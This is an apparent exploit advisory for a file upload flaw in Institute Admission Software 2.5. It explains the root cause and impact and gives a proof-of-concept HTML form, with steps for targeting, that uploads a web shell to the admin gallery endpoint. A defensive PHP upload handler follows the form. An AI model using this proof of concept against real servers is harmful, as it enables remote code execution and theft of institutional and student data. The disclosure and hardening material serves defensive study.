Institute Admission Software 2.5 is known to have a critical shell upload vulnerability.
This flaw typically resides in insecure file upload functionalities within the application. Attackers exploit it by uploading malicious web shell scripts (e.g., PHP, ASP) instead of legitimate files like documents or images.
When the server processes or stores the uploaded script, it can be executed. This grants the attacker Remote Code Execution (RCE) capabilities, giving them full control over the web server.
Consequences include accessing, modifying, or deleting sensitive student and institutional data, defacing the website, or using the server as a pivot point for further network attacks. This is a severe vulnerability requiring immediate patching, strict input validation, and secure file handling practices.
=============================================================================================================================================
| # Title : Institute Admission Software 2.5 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 137.0.1 (64 bits) |
| # Vendor : https://softmaart.com/institute-admission-software.php |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] Summary: This vulnerability affects Institute Admission Software v2.5, where the application fails to properly validate and restrict uploaded files in the gallery upload functionality within the admin panel.
An attacker can exploit this weakness by directly submitting a crafted multipart/form-data POST request to the vulnerable endpoint, allowing the upload of arbitrary executable files instead of legitimate images.
Due to the absence of strict server-side file type validation, content inspection, and execution controls, a malicious file (e.g. PHP web shell or executable payload) can be successfully uploaded to the publicly accessible /uploads/ directory.
Once uploaded, the attacker may directly access the file via the browser, potentially leading to Remote Code Execution (RCE) on the target server.
[+] Impact includes:
Arbitrary file upload
Remote command execution
Full web application compromise
Possible server takeover depending on permissions
[+] Root Cause:
Missing MIME-type and extension validation
No server-side file execution restrictions
Insecure upload directory exposure
[+] Severity: High
Attack Vector: Remote / Unauthenticated (depending on admin access exposure)
This issue highlights a critical failure in secure file handling practices and emphasizes the necessity of enforcing strict upload validation, randomized file naming, execution blocking, and proper access controls.
[+] The following HTML code uploads an executable malicious file remotely.
[+] Save code as: poc.html
[+] Line 01: set your target
[+] Link to the uploaded files: /uploads/
[+] Use payload:
<form action="http://127.0.0.1/gpgcgairsain.ac.in/admin_panel/gallery.php?id=19" method="POST" enctype="multipart/form-data">
<label for="event">Event:</label>
<select name="event" id="event">
<option value="19">Hindi Departmental Programme</option>
</select>
<br><br>
<label for="photo">Photo:</label>
<input type="file" name="photo" id="photo" accept="image/*">
<br><br>
<input type="hidden" name="db_photo" value="">
<input type="submit" name="submit" value="Upload">
</form>
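A server-side handler for the `photo` field posted by the form above that applies the controls the summary calls for (content inspection, server-chosen random names, storage outside the executable web root). This is an added example, not code from the advisory or the vendor; the storage path, size limit and function name are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not vendor code. Assumptions: the store path, the size limit and
// the function name are hypothetical; the field name "photo" comes from the form.
const GALLERY_STORE = '/var/www/private/gallery'; // outside the web root, never executed
const MAX_BYTES = 5 * 1024 * 1024;

function store_gallery_photo(array $file): string
{
    // Detected content type => extension the server assigns.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file((string) ($file['tmp_name'] ?? ''))) {
        throw new RuntimeException('upload failed');
    }
    $size = filesize($file['tmp_name']);
    if ($size === false || $size === 0 || $size > MAX_BYTES) {
        throw new RuntimeException('size not allowed');
    }
    // Inspect the bytes; $file['type'] and $file['name'] are client-supplied and unused.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !array_key_exists($mime, $allowed)) {
        throw new RuntimeException('not an allowed image type');
    }
    // An image header followed by script code still passes the sniff above, so the
    // name and extension are chosen here and the store is a non-executing location.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = GALLERY_STORE . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);
    return $name; // save this in the database instead of the original filename
}

// Entry point for the multipart POST; the admin-session check is assumed to run first.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['photo'])) {
    try {
        $stored = store_gallery_photo($_FILES['photo']);
        echo 'stored as ' . htmlspecialchars($stored, ENT_QUOTES);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'upload rejected';
    }
}
```

Files that already sit in the public /uploads/ directory are not covered by this handler; the web server still has to be configured not to execute scripts from that location.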
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================